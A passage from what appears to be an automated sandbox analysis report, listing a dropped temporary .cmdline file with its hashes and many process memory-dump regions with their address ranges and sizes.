                                                                                    22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\xmq2prjm\xmq2prjm.cmdline

                                                                                    Filesize

                                                                                    607B

                                                                                    MD5

                                                                                    fa5149631a0e9b3aab922c232095586c

                                                                                    SHA1

                                                                                    c0c99f7582b8f5fd2fe039bfb4a70167fff9c7a2

                                                                                    SHA256

                                                                                    1032a738d9c70cddc993a9f74a8c5298881555615eab060c80509ef9d1145d8d

                                                                                    SHA512

                                                                                    e35fe10af51116403f06dd37b8f2507aecceecbfbb84315267db57f9ca5e9ec9366919e62960fc1de83f2eafa1ea4fb40fc987f3e354b9398035fe22c718288d

                                                                                  • memory/1552-311-0x00007FFF95310000-0x00007FFF953DD000-memory.dmp

                                                                                    Filesize

                                                                                    820KB

                                                                                  • memory/1552-76-0x00007FFF997D0000-0x00007FFF997E4000-memory.dmp

                                                                                    Filesize

                                                                                    80KB

                                                                                  • memory/1552-213-0x00007FFF9A0D0000-0x00007FFF9A0E9000-memory.dmp

                                                                                    Filesize

                                                                                    100KB

                                                                                  • memory/1552-106-0x00007FFF990F0000-0x00007FFF99113000-memory.dmp

                                                                                    Filesize

                                                                                    140KB

                                                                                  • memory/1552-73-0x00007FFF921F0000-0x00007FFF92719000-memory.dmp

                                                                                    Filesize

                                                                                    5.2MB

                                                                                  • memory/1552-70-0x00007FFF95560000-0x00007FFF95B50000-memory.dmp

                                                                                    Filesize

                                                                                    5.9MB

                                                                                  • memory/1552-74-0x00007FFF99880000-0x00007FFF998A4000-memory.dmp

                                                                                    Filesize

                                                                                    144KB

                                                                                  • memory/1552-368-0x00007FFF997D0000-0x00007FFF997E4000-memory.dmp

                                                                                    Filesize

                                                                                    80KB

                                                                                  • memory/1552-71-0x00007FFF95310000-0x00007FFF953DD000-memory.dmp

                                                                                    Filesize

                                                                                    820KB

                                                                                  • memory/1552-72-0x000001D199C10000-0x000001D19A139000-memory.dmp

                                                                                    Filesize

                                                                                    5.2MB

                                                                                  • memory/1552-369-0x00007FFF99870000-0x00007FFF9987D000-memory.dmp

                                                                                    Filesize

                                                                                    52KB

                                                                                  • memory/1552-66-0x00007FFF990B0000-0x00007FFF990E3000-memory.dmp

                                                                                    Filesize

                                                                                    204KB

                                                                                  • memory/1552-292-0x00007FFF99920000-0x00007FFF9992D000-memory.dmp

                                                                                    Filesize

                                                                                    52KB

                                                                                  • memory/1552-64-0x00007FFF99920000-0x00007FFF9992D000-memory.dmp

                                                                                    Filesize

                                                                                    52KB

                                                                                  • memory/1552-303-0x00007FFF990B0000-0x00007FFF990E3000-memory.dmp

                                                                                    Filesize

                                                                                    204KB

                                                                                  • memory/1552-62-0x00007FFF9A0D0000-0x00007FFF9A0E9000-memory.dmp

                                                                                    Filesize

                                                                                    100KB

                                                                                  • memory/1552-60-0x00007FFF953E0000-0x00007FFF95556000-memory.dmp

                                                                                    Filesize

                                                                                    1.5MB

                                                                                  • memory/1552-58-0x00007FFF990F0000-0x00007FFF99113000-memory.dmp

                                                                                    Filesize

                                                                                    140KB

                                                                                  • memory/1552-56-0x00007FFF9A1B0000-0x00007FFF9A1C9000-memory.dmp

                                                                                    Filesize

                                                                                    100KB

                                                                                  • memory/1552-313-0x000001D199C10000-0x000001D19A139000-memory.dmp

                                                                                    Filesize

                                                                                    5.2MB

                                                                                  • memory/1552-81-0x00007FFF9A1B0000-0x00007FFF9A1C9000-memory.dmp

                                                                                    Filesize

                                                                                    100KB

                                                                                  • memory/1552-54-0x00007FFF997F0000-0x00007FFF9981D000-memory.dmp

                                                                                    Filesize

                                                                                    180KB

                                                                                  • memory/1552-29-0x00007FFF99880000-0x00007FFF998A4000-memory.dmp

                                                                                    Filesize

                                                                                    144KB

                                                                                  • memory/1552-32-0x00007FFF9E7E0000-0x00007FFF9E7EF000-memory.dmp

                                                                                    Filesize

                                                                                    60KB

                                                                                  • memory/1552-25-0x00007FFF95560000-0x00007FFF95B50000-memory.dmp

                                                                                    Filesize

                                                                                    5.9MB

                                                                                  • memory/1552-119-0x00007FFF953E0000-0x00007FFF95556000-memory.dmp

                                                                                    Filesize

                                                                                    1.5MB

                                                                                  • memory/1552-78-0x00007FFF997F0000-0x00007FFF9981D000-memory.dmp

                                                                                    Filesize

                                                                                    180KB

                                                                                  • memory/1552-79-0x00007FFF99870000-0x00007FFF9987D000-memory.dmp

                                                                                    Filesize

                                                                                    52KB

                                                                                  • memory/1552-82-0x00007FFF951F0000-0x00007FFF9530C000-memory.dmp

                                                                                    Filesize

                                                                                    1.1MB

                                                                                  • memory/1552-322-0x00007FFF921F0000-0x00007FFF92719000-memory.dmp

                                                                                    Filesize

                                                                                    5.2MB

                                                                                  • memory/1552-341-0x00007FFF95560000-0x00007FFF95B50000-memory.dmp

                                                                                    Filesize

                                                                                    5.9MB

                                                                                  • memory/1552-355-0x00007FFF951F0000-0x00007FFF9530C000-memory.dmp

                                                                                    Filesize

                                                                                    1.1MB

                                                                                  • memory/1552-347-0x00007FFF953E0000-0x00007FFF95556000-memory.dmp

                                                                                    Filesize

                                                                                    1.5MB

                                                                                  • memory/1552-342-0x00007FFF99880000-0x00007FFF998A4000-memory.dmp

                                                                                    Filesize

                                                                                    144KB

                                                                                  • memory/1552-356-0x00007FFF95560000-0x00007FFF95B50000-memory.dmp

                                                                                    Filesize

                                                                                    5.9MB

                                                                                  • memory/1552-370-0x00007FFF951F0000-0x00007FFF9530C000-memory.dmp

                                                                                    Filesize

                                                                                    1.1MB

                                                                                  • memory/1552-381-0x00007FFF95310000-0x00007FFF953DD000-memory.dmp

                                                                                    Filesize

                                                                                    820KB

                                                                                  • memory/1552-380-0x00007FFF990B0000-0x00007FFF990E3000-memory.dmp

                                                                                    Filesize

                                                                                    204KB

                                                                                  • memory/1552-379-0x00007FFF99920000-0x00007FFF9992D000-memory.dmp

                                                                                    Filesize

                                                                                    52KB

                                                                                  • memory/1552-378-0x00007FFF9A0D0000-0x00007FFF9A0E9000-memory.dmp

                                                                                    Filesize

                                                                                    100KB

                                                                                  • memory/1552-377-0x00007FFF953E0000-0x00007FFF95556000-memory.dmp

                                                                                    Filesize

                                                                                    1.5MB

                                                                                  • memory/1552-376-0x00007FFF990F0000-0x00007FFF99113000-memory.dmp

                                                                                    Filesize

                                                                                    140KB

                                                                                  • memory/1552-375-0x00007FFF9A1B0000-0x00007FFF9A1C9000-memory.dmp

                                                                                    Filesize

                                                                                    100KB

                                                                                  • memory/1552-374-0x00007FFF997F0000-0x00007FFF9981D000-memory.dmp

                                                                                    Filesize

                                                                                    180KB

                                                                                  • memory/1552-373-0x00007FFF9E7E0000-0x00007FFF9E7EF000-memory.dmp

                                                                                    Filesize

                                                                                    60KB

                                                                                  • memory/1552-372-0x00007FFF99880000-0x00007FFF998A4000-memory.dmp

                                                                                    Filesize

                                                                                    144KB

                                                                                  • memory/1552-371-0x00007FFF921F0000-0x00007FFF92719000-memory.dmp

                                                                                    Filesize

                                                                                    5.2MB

                                                                                  • memory/3164-235-0x0000024425260000-0x0000024425268000-memory.dmp

                                                                                    Filesize

                                                                                    32KB

                                                                                  • memory/5068-88-0x0000019A5B910000-0x0000019A5B932000-memory.dmp

                                                                                    Filesize

                                                                                    136KB